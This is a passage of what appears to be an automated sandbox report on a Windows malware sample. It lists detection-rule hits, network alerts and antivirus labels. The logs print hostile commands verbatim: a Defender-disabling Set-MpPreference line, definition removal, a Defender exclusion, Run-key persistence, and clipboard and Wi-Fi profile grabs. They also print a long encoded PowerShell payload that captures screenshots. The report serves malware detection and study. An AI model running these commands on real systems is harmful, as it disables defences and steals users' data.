AAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dasHost
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7952, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 7296, ProcessName: cmd.exe
                                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Recovery\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ParentProcessId: 7204, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7268, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7304, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7440, ProcessName: powershell.exe
                                  Source: Process startedAuthor: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ParentProcessId: 7204, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7268, ProcessName: svchost.exe

                                  Data Obfuscation

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8076, ProcessName: cmd.exe
                                  No Snort rule has matched
                                  Timestamp:2024-08-02T00:07:34.734705+0200
                                  SID:2048095
                                  Source Port:49738
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:2024-08-02T00:07:10.415595+0200
                                  SID:2826930
                                  Source Port:49740
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:Crypto Currency Mining Activity Detected
                                  Timestamp:2024-08-02T00:07:44.902790+0200
                                  SID:2036289
                                  Source Port:55707
                                  Destination Port:53
                                  Protocol:UDP
                                  Classtype:Crypto Currency Mining Activity Detected
                                  Timestamp:2024-08-02T00:08:40.967219+0200
                                  SID:2048130
                                  Source Port:49738
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Users\user\AppData\Local\Temp\E9LXmGxXsL.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Recovery\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\ProgramData\svchost.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\ProgramData\setup.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\Program Files\Mozilla Firefox\dwm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Recovery\powershell.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
